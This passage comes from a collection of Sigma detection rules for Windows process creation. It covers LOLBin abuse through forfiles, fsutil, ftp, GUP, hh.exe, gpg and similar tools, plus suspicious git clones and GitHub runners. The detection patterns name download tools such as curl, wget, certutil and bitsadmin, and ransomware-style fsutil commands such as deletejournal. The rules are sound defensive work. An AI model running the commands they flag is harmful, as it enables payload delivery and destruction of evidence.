    "content": "title: Forfiles Command Execution\nid: 9aa5106d-bce3-4b13-86df-3a20f1d5cf0b\nrelated:\n    - id: a85cf4e3-56ee-4e79-adeb-789f8fb209a8\n      type: obsolete\n    - id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02\n      type: obsolete\nstatus: test\ndescription: |\n    Detects the execution of \"forfiles\" with the \"/c\" flag.\n    While this is an expected behavior of the tool, it can be abused in order to proxy execution through it with any binary.\n    Can be used to bypass application whitelisting.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Forfiles/\n    - https://pentestlab.blog/2020/07/06/indirect-command-execution/\nauthor: Tim Rauch, Elastic, E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community\ndate: 2022-06-14\nmodified: 2024-03-05\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\forfiles.exe'\n        - OriginalFileName: 'forfiles.exe'\n    selection_cli:\n        CommandLine|contains|windash: ' -c '\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use via a batch script or by an administrator.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_format_uncommon_filesystem_load.yml",
    "content": "title: Uncommon FileSystem Load Attempt By Format.com\nid: 9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60\nstatus: test\ndescription: |\n    Detects the execution of format.com with an uncommon filesystem selection that could indicate a defense evasion activity in which \"format.com\" is used to load malicious DLL files or other programs.\nreferences:\n    - https://twitter.com/0gtweet/status/1477925112561209344\n    - https://twitter.com/wdormann/status/1478011052130459653?s=20\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-01-04\nmodified: 2024-05-13\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\format.com'\n        CommandLine|contains: '/fs:'\n    filter_main_known_fs:\n        CommandLine|contains:\n            - '/fs:exFAT'\n            - '/fs:FAT'\n            - '/fs:NTFS'\n            - '/fs:ReFS'\n            - '/fs:UDF'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_fsi_fsharp_code_execution.yml",
    "content": "title: Use of FSharp Interpreters\nid: b96b2031-7c17-4473-afe7-a30ce714db29\nstatus: test\ndescription: |\n    Detects the execution of FSharp Interpreters \"FsiAnyCpu.exe\" and \"FSi.exe\"\n    Both can be used for AWL bypass and to execute F# code via scripts or inline.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/design/applications-that-can-bypass-wdac\n    - https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/\nauthor: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io\ndate: 2022-06-02\nmodified: 2024-04-23\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith:\n              - '\\fsi.exe'\n              - '\\fsianycpu.exe'\n        - OriginalFileName:\n              - 'fsi.exe'\n              - 'fsianycpu.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate use by a software developer.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_fsutil_drive_enumeration.yml",
    "content": "title: Fsutil Drive Enumeration\nid: 63de06b9-a385-40b5-8b32-73f2b9ef84b6\nstatus: test\ndescription: Attackers may leverage fsutil to enumerated connected drives.\nreferences:\n    - Turla has used fsutil fsinfo drives to list connected drives.\n    - https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/discovery_peripheral_device.toml\nauthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'\ndate: 2022-03-29\nmodified: 2022-07-14\ntags:\n    - attack.discovery\n    - attack.t1120\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\fsutil.exe'\n        - OriginalFileName: 'fsutil.exe'\n    selection_cli:\n        CommandLine|contains: 'drives'\n    condition: all of selection_*\nfalsepositives:\n    - Certain software or administrative tasks may trigger false positives.\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml",
    "content": "title: Potentially Suspicious NTFS Symlink Behavior Modification\nid: c0b2768a-dd06-4671-8339-b16ca8d1f27f\nstatus: test\ndescription: |\n    Detects the modification of NTFS symbolic link behavior using fsutil, which could be used to enable remote to local or remote to remote symlinks for potential attacks.\nreferences:\n    - https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware\n    - https://learn.microsoft.com/fr-fr/windows-server/administration/windows-commands/fsutil-behavior\n    - https://thedfirreport.com/2025/06/30/hide-your-rdp-password-spray-leads-to-ransomhub-deployment/\nauthor: frack113, The DFIR Report\ndate: 2022-03-02\nmodified: 2025-11-13\ntags:\n    - attack.execution\n    - attack.t1059\n    - attack.defense-evasion\n    - attack.t1222.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img_proxy:\n        # Note: Example command observed:  cmd.exe /c \"fsutil behaviour set SymlinkEvaluation\"\n        - Image|endswith:\n              - '\\cmd.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'Cmd.Exe'\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_fsutil_cli:\n        CommandLine|contains|all:\n            - 'fsutil'\n            - 'behavior'\n            - 'set'\n            - 'SymlinkEvaluation'\n    selection_symlink_params:\n        CommandLine|contains:\n            - 'R2L:1' # Remote to Local\n            - 'R2R:1' # Remote to Remote\n            - 'L2L:1' # Local to Local\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate usage, investigate the parent process and context to determine if benign.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_fsutil_usage.yml",
    "content": "title: Fsutil Suspicious Invocation\nid: add64136-62e5-48ea-807e-88638d02df1e\nstatus: stable\ndescription: |\n  Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\n  Might be used by ransomwares during the attack (seen by NotPetya and others).\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070/T1070.md\n    - https://eqllib.readthedocs.io/en/latest/analytics/c91f422a-5214-4b17-8664-c5fcf115c0a2.html\n    - https://github.com/albertzsigovits/malware-notes/blob/558898932c1579ff589290092a2c8febefc3a4c9/Ransomware/Lockbit.md\n    - https://blog.cluster25.duskrise.com/2023/05/22/back-in-black-blackbyte-nt\nauthor: Ecco, E.M. Anhaus, oscd.community\ndate: 2019-09-26\nmodified: 2023-09-09\ntags:\n    - attack.defense-evasion\n    - attack.impact\n    - attack.t1070\n    - attack.t1485\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\fsutil.exe'\n        - OriginalFileName: 'fsutil.exe'\n    selection_cli:\n        CommandLine|contains:\n            - 'deletejournal'        # usn deletejournal ==> generally ransomware or attacker\n            - 'createjournal'        # usn createjournal ==> can modify config to set it to a tiny size\n            - 'setZeroData'          # file setZeroData  ==> empties a file with zeroes\n    condition: all of selection_*\nfalsepositives:\n    - Admin activity\n    - Scripts and administrative tools used in the monitored environment\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_ftp_arbitrary_command_execution.yml",
    "content": "title: Potential Arbitrary Command Execution Via FTP.EXE\nid: 06b401f4-107c-4ff9-947f-9ec1e7649f1e\nstatus: test\ndescription: Detects execution of \"ftp.exe\" with the \"-s\" or \"/s\" (script) flag and any child processes run by \"ftp.exe\".\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Ftp/\nauthor: Victor Sergeev, oscd.community\ndate: 2020-10-09\nmodified: 2024-04-23\ntags:\n    - attack.execution\n    - attack.t1059\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\ftp.exe'\n    selection_child_img:\n        - Image|endswith: '\\ftp.exe'\n        - OriginalFileName: 'ftp.exe'\n    selection_child_cli:\n        CommandLine|contains|windash: '-s:'\n    condition: selection_parent or all of selection_child_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_gfxdownloadwrapper_arbitrary_file_download.yml",
    "content": "title: Arbitrary File Download Via GfxDownloadWrapper.EXE\nid: eee00933-a761-4cd0-be70-c42fe91731e7\nstatus: test\ndescription: Detects execution of GfxDownloadWrapper.exe with a URL as an argument to download file.\nreferences:\n    - https://lolbas-project.github.io/lolbas/HonorableMentions/GfxDownloadWrapper/\nauthor: Victor Sergeev, oscd.community\ndate: 2020-10-09\nmodified: 2023-10-18\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\GfxDownloadWrapper.exe'\n        CommandLine|contains:\n            - 'http://'\n            - 'https://'\n    filter_main_known_urls:\n        CommandLine|contains: 'https://gameplayapi.intel.com/'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_git_susp_clone.yml",
    "content": "title: Suspicious Git Clone\nid: aef9d1f1-7396-4e92-a927-4567c7a495c1\nstatus: test\ndescription: Detects execution of \"git\" to clone a remote repository whose URL contains suspicious keywords, such as exploit or vulnerability names\nreferences:\n    - https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-03\nmodified: 2023-01-10\ntags:\n    - attack.reconnaissance\n    - attack.t1593.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\git.exe'\n              - '\\git-remote-https.exe'\n        - OriginalFileName: 'git.exe'\n    selection_cli:\n        CommandLine|contains:\n            - ' clone '\n            - 'git-remote-https '\n    selection_keyword:\n        CommandLine|contains:\n            # Add more suspicious keywords\n            - 'exploit'\n            - 'Vulns'\n            - 'vulnerability'\n            - 'RemoteCodeExecution'\n            - 'Invoke-'\n            - 'CVE-'\n            - 'poc-'\n            - 'ProofOfConcept'\n            # Add more vuln names\n            - 'proxyshell'\n            - 'log4shell'\n            - 'eternalblue'\n            - 'eternal-blue'\n            - 'MS17-'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_github_self_hosted_runner.yml",
    "content": "title: Github Self-Hosted Runner Execution\nid: 5bac7a56-da88-4c27-922e-c81e113b20cb\nstatus: test\ndescription: |\n    Detects GitHub self-hosted runners executing workflows on local infrastructure that could be abused for persistence and code execution.\n    Shai-Hulud is an npm supply chain worm targeting CI/CD environments.\n    It installs runners on compromised systems to maintain access after credential theft, leveraging their access to secrets and internal networks.\nreferences:\n    - https://about.gitlab.com/blog/gitlab-discovers-widespread-npm-supply-chain-attack/\n    - https://securitylabs.datadoghq.com/articles/shai-hulud-2.0-npm-worm/\nauthor: Daniel Koifman (KoifSec)\ndate: 2025-11-29\ntags:\n    - attack.command-and-control\n    - attack.t1102.002\n    - attack.t1071\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_worker_img:  # Example command C:\\Users\\Lab\\actions-runner\\bin\\Runner.Worker.exe spawnclient 1288 1252\n        - Image|endswith: '\\Runner.Worker.exe'\n        - OriginalFileName: 'Runner.Worker.dll'\n    selection_worker_cli:\n        CommandLine|contains: 'spawnclient'\n    selection_listener_img: # Example command C:\\Users\\Lab\\actions-runner\\bin\\Runner.Listener.exe  configure --url https://github.com/ABC/ABC --token 123123\n        - Image|endswith: '\\Runner.Listener.exe'\n        - OriginalFileName: 'Runner.Listener.dll'\n    selection_listener_cli:\n        CommandLine|contains:\n            - 'run'\n            - 'configure'\n    condition: all of selection_worker_* or all of selection_listener_*\nfalsepositives:\n    - Legitimate GitHub self-hosted runner installations on designated CI/CD infrastructure\n    - Authorized runner deployments by DevOps/Platform teams following change management\n    - Scheduled runner updates or reconfigurations on existing build agents\n    - Self-hosted runners that follow expected/known naming patterns\n    - Installation via expected/known configuration management tools (reflected mostly as parent process name)\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_github_self_hosted_runner/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_googleupdate_susp_child_process.yml",
    "content": "title: Potentially Suspicious GoogleUpdate Child Process\nid: 84b1ecf9-6eff-4004-bafb-bae5c0e251b2\nrelated:\n    - id: bdbab15a-3826-48fa-a1b7-723cd8f32fcc\n      type: derived\nstatus: test\ndescription: Detects potentially suspicious child processes of \"GoogleUpdate.exe\"\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-15\nmodified: 2023-05-22\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\GoogleUpdate.exe'\n    filter_main_known_legit:\n        # Some other legit child process might exist. It's better to make a baseline before running this in production\n        - Image|contains: '\\Google' # Example: GoogleUpdate.exe, GoogleCrashHandler.exe, GoogleUpdateComRegisterShell64.exe\n        - Image|endswith:\n              - '\\setup.exe'\n              - 'chrome_updater.exe'\n              - 'chrome_installer.exe'\n    filter_main_image_null:\n        Image: null\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_gpg4win_decryption.yml",
    "content": "title: File Decryption Using Gpg4win\nid: 037dcd71-33a8-4392-bb01-293c94663e5a\nstatus: test\ndescription: Detects usage of Gpg4win to decrypt files\nreferences:\n    - https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html\n    - https://www.gpg4win.de/documentation.html\n    - https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-09\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_metadata:\n        - Image|endswith:\n              - '\\gpg.exe'\n              - '\\gpg2.exe'\n        - Description: 'GnuPG’s OpenPGP tool'\n    selection_cli:\n        CommandLine|contains|all:\n            - ' -d '\n            - 'passphrase'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_gpg4win_encryption.yml",
    "content": "title: File Encryption Using Gpg4win\nid: 550bbb84-ce5d-4e61-84ad-e590f0024dcd\nstatus: test\ndescription: Detects usage of Gpg4win to encrypt files\nreferences:\n    - https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html\n    - https://www.gpg4win.de/documentation.html\n    - https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-09\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_metadata:\n        - Image|endswith:\n              - '\\gpg.exe'\n              - '\\gpg2.exe'\n        - Description: 'GnuPG’s OpenPGP tool'\n    selection_cli:\n        CommandLine|contains|all:\n            - ' -c '\n            - 'passphrase'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_gpg4win_portable_execution.yml",
    "content": "title: Portable Gpg.EXE Execution\nid: 77df53a5-1d78-4f32-bc5a-0e7465bd8f41\nstatus: test\ndescription: Detects the execution of \"gpg.exe\" from uncommon location. Often used by ransomware and loaders to decrypt/encrypt data.\nreferences:\n    - https://www.trendmicro.com/vinfo/vn/threat-encyclopedia/malware/ransom.bat.zarlock.a\n    - https://securelist.com/locked-out/68960/\n    - https://github.com/redcanaryco/atomic-red-team/blob/c4097dc7ed14d7f7d08c89d148c4307097e8c294/atomics/T1486/T1486.md\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-06\nmodified: 2023-11-10\ntags:\n    - attack.impact\n    - attack.t1486\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith:\n              - '\\gpg.exe'\n              - '\\gpg2.exe'\n        - OriginalFileName: 'gpg.exe'\n        - Description: 'GnuPG’s OpenPGP tool'\n    filter_main_legit_location:\n        Image|contains:\n            - ':\\Program Files (x86)\\GNU\\GnuPG\\bin\\'\n            - ':\\Program Files (x86)\\GnuPG VS-Desktop\\'\n            - ':\\Program Files (x86)\\GnuPG\\bin\\'\n            - ':\\Program Files (x86)\\Gpg4win\\bin\\'\n    condition: selection and not 1 of filter_main_*\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_gpg4win_susp_location.yml",
    "content": "title: File Encryption/Decryption Via Gpg4win From Suspicious Locations\nid: e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d\nstatus: test\ndescription: Detects usage of Gpg4win to encrypt/decrypt files located in potentially suspicious locations.\nreferences:\n    - https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html\n    - https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/\nauthor: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)\ndate: 2022-11-30\nmodified: 2023-08-09\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_metadata:\n        - Image|endswith:\n              - '\\gpg.exe'\n              - '\\gpg2.exe'\n        - Product: 'GNU Privacy Guard (GnuPG)'\n        - Description: 'GnuPG’s OpenPGP tool'\n    selection_cli:\n        CommandLine|contains: '-passphrase'\n    selection_paths:\n        CommandLine|contains:\n            - ':\\PerfLogs\\'\n            - ':\\Temp\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Temp\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\AppData\\Roaming\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_gpresult_execution.yml",
    "content": "title: Gpresult Display Group Policy Information\nid: e56d3073-83ff-4021-90fe-c658e0709e72\nstatus: test\ndescription: Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult\n    - https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/\n    - https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf\nauthor: frack113\ndate: 2022-05-01\ntags:\n    - attack.discovery\n    - attack.t1615\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '\\gpresult.exe'\n        CommandLine|contains:\n            - '/z'\n            - '/v'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\nsimulation:\n    - type: atomic-red-team\n      name: Display group policy information via gpresult\n      technique: T1615\n      atomic_guid: 0976990f-53b1-4d3f-a185-6df5be429d3b\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_gpresult_execution/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_gup_arbitrary_binary_execution.yml",
    "content": "title: Arbitrary Binary Execution Using GUP Utility\nid: d65aee4d-2292-4cea-b832-83accd6cfa43\nstatus: test\ndescription: Detects execution of the Notepad++ updater (gup) to launch other commands or executables\nreferences:\n    - https://twitter.com/nas_bench/status/1535322445439180803\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-10\nmodified: 2023-03-02\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\gup.exe'\n        Image|endswith: '\\explorer.exe'\n    filter:\n        Image|endswith: '\\explorer.exe'\n        CommandLine|contains: '\\Notepad++\\notepad++.exe'\n    filter_parent:\n        ParentImage|contains: '\\Notepad++\\updater\\'\n    filter_null:\n        CommandLine: null\n    condition: selection and not 1 of filter*\nfalsepositives:\n    - Other parent binaries using GUP not currently identified\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_gup_download.yml",
    "content": "title: File Download Using Notepad++ GUP Utility\nid: 44143844-0631-49ab-97a0-96387d6b2d7c\nstatus: test\ndescription: Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.\nreferences:\n    - https://twitter.com/nas_bench/status/1535322182863179776\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-10\nmodified: 2023-03-02\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\GUP.exe'\n        - OriginalFileName: 'gup.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - ' -unzipTo '\n            - 'http'\n    filter:\n        ParentImage|endswith: '\\notepad++.exe'\n    condition: all of selection* and not filter\nfalsepositives:\n    - Parent processes other than notepad++ using GUP that are not currently identified\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_gup_susp_child_process.yml",
    "content": "title: Suspicious Child Process of Notepad++ Updater - GUP.Exe\nid: bb0e87ce-c89f-4857-84fa-095e4483e9cb\nstatus: experimental\ndescription: |\n    Detects suspicious child process creation by the Notepad++ updater process (gup.exe).\n    This could indicate potential exploitation of the updater component to deliver unwanted malware.\nreferences:\n    - https://notepad-plus-plus.org/news/v889-released/\n    - https://www.heise.de/en/news/Notepad-updater-installed-malware-11109726.html\n    - https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/\n    - https://www.validin.com/blog/exploring_notepad_plus_plus_network_indicators/\n    - https://securelist.com/notepad-supply-chain-attack/118708/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2026-02-03\ntags:\n    - attack.collection\n    - attack.credential-access\n    - attack.t1195.002\n    - attack.initial-access\n    - attack.t1557\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\gup.exe'\n    selection_child_img:\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\cscript.exe'\n            - '\\wscript.exe'\n            - '\\mshta.exe'\n    selection_child_cli:\n        CommandLine|contains:\n            - 'bitsadmin'\n            - 'certutil'\n            - 'curl'\n            - 'finger'\n            - 'forfiles'\n            - 'regsvr32'\n            - 'rundll32'\n            - 'wget'\n    condition: selection_parent and 1 of selection_child_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_gup_suspicious_execution.yml",
    "content": "title: Suspicious GUP Usage\nid: 0a4f6091-223b-41f6-8743-f322ec84930b\nstatus: test\ndescription: Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-02-06\nmodified: 2022-08-13\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\GUP.exe'\n    filter_programfiles:\n        Image|endswith:\n            - '\\Program Files\\Notepad++\\updater\\GUP.exe'\n            - '\\Program Files (x86)\\Notepad++\\updater\\GUP.exe'\n    filter_user:\n        Image|contains: '\\Users\\'\n        Image|endswith:\n            - '\\AppData\\Local\\Notepad++\\updater\\GUP.exe'\n            - '\\AppData\\Roaming\\Notepad++\\updater\\GUP.exe'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Execution of tools named GUP.exe and located in folders different than Notepad++\\updater\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml",
    "content": "title: HH.EXE Execution\nid: 68c8acb4-1b60-4890-8e82-3ddf7a6dba84\nstatus: test\ndescription: Detects the execution of \"hh.exe\" to open \".chm\" files.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.001/T1218.001.md\n    - https://eqllib.readthedocs.io/en/latest/analytics/b25aa548-7937-11e9-8f5c-d46d6d62a49e.html\n    - https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37\nauthor: E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community\ndate: 2019-10-24\nmodified: 2023-12-11\ntags:\n    - attack.defense-evasion\n    - attack.t1218.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName: 'HH.exe'\n        - Image|endswith: '\\hh.exe'\n    selection_cli:\n        CommandLine|contains: '.chm'\n    condition: all of selection_*\nfalsepositives:\n    - False positives are expected with legitimate \".CHM\" files\nlevel: low\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_hh_chm_execution/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hh_chm_remote_download_or_execution.yml",
    "content": "title: Remote CHM File Download/Execution Via HH.EXE\nid: f57c58b3-ee69-4ef5-9041-455bf39aaa89\nstatus: test\ndescription: Detects the usage of \"hh.exe\" to execute/download remotely hosted \".chm\" files.\nreferences:\n    - https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html\n    - https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md\n    - https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-29\nmodified: 2024-01-31\ntags:\n    - attack.defense-evasion\n    - attack.t1218.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName: 'HH.exe'\n        - Image|endswith: '\\hh.exe'\n    selection_cli:\n        CommandLine|contains:\n            - 'http://'\n            - 'https://'\n            - '\\\\\\\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml",
    "content": "title: HTML Help HH.EXE Suspicious Child Process\nid: 52cad028-0ff0-4854-8f67-d25dfcbc78b4\nstatus: test\ndescription: Detects a suspicious child process of a Microsoft HTML Help (HH.exe)\nreferences:\n    - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/\n    - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7\n    - https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/\n    - https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37\nauthor: Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems)\ndate: 2020-04-01\nmodified: 2023-04-12\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.initial-access\n    - attack.t1047\n    - attack.t1059.001\n    - attack.t1059.003\n    - attack.t1059.005\n    - attack.t1059.007\n    - attack.t1218\n    - attack.t1218.001\n    - attack.t1218.010\n    - attack.t1218.011\n    - attack.t1566\n    - attack.t1566.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\hh.exe'\n        Image|endswith:\n            - '\\CertReq.exe'\n            - '\\CertUtil.exe'\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\installutil.exe'\n            - '\\MSbuild.exe'\n            - '\\MSHTA.EXE'\n            - '\\msiexec.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\schtasks.exe'\n            - '\\wmic.exe'\n            - '\\wscript.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hh_susp_execution.yml",
